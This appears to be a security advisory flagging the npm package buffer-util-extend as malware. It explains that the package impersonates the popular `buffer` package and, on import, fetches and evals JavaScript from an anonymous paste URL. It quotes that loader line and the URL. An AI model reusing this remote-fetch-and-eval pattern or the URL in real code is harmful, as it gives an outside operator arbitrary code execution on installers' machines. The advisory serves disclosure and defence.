MAL-2026-2920
Dashboard / Malicious Package / MAL-2026-2920
MAL-2026-2920
Summary: Malicious code in buffer-util-extend (npm)
Details: Source: amazon-inspector (374d8c5c4c32544741d1ea3788cfbccc3ee175f7181f8bdfa71cf4fde44121eb) On require/import, index.js decodes a base64 string literal to https://www.jsonkeeper.com/b/CWOV9, fetches that anonymous JSON paste, and passes the response's `content` field to `eval()` (index.js:46 stores the base64-encoded URL; index.js:59-65 performs `fetch(atob(...)).then(t=>t.json()).then(data => eval(data.content))`). Any consumer that `require`s this package executes whatever JavaScript is currently hosted at the mutable paste URL — full arbitrary code execution on the installer/build machine, with the operator able to swap payloads at any time without republishing the package. The package additionally impersonates the widely-used `buffer` package: it copies Feross Aboukhadijeh's authorship metadata, homepage `https://github.com/feross/buffer`, the README references, and the Buffer polyfill source verbatim, while adding unrelated dependencies (`axios`, `request`, `execp`) and the remote-eval payload. Name-confusion against a top-tier npm package combined with concrete import-time RCE makes this a deliberate supply-chain attack. Source: ghsa-malware (02f401e0ab3531cba5483401d32d2d7eea5db24f589519b5ade0af6eb4c689c7) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. Source: ossf-package-analysis (cbf9a942d65fe7c78ccee4d48e1122302552eb0aa8b9f442cf7f5eba43496d22) The OpenSSF Package Analysis project identified 'buffer-util-extend' @ 1.0.8 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
References: https://www.npmjs.com/package/buffer-util-extend/v/1.0.13, https://www.npmjs.com/package/buffer-util-extend/v/1.0.11, https://github.com/advisories/GHSA-g44v-3gq3-j8p6, https://www.sonatype.com/blog/lazarus-groups-latest-brandjacking-campaign-on-npm
Affected packages
Package
Name: buffer-util-extend
Purl: pkg:npm/buffer-util-extend
Affected ranges
Type: SEMVER
Events:
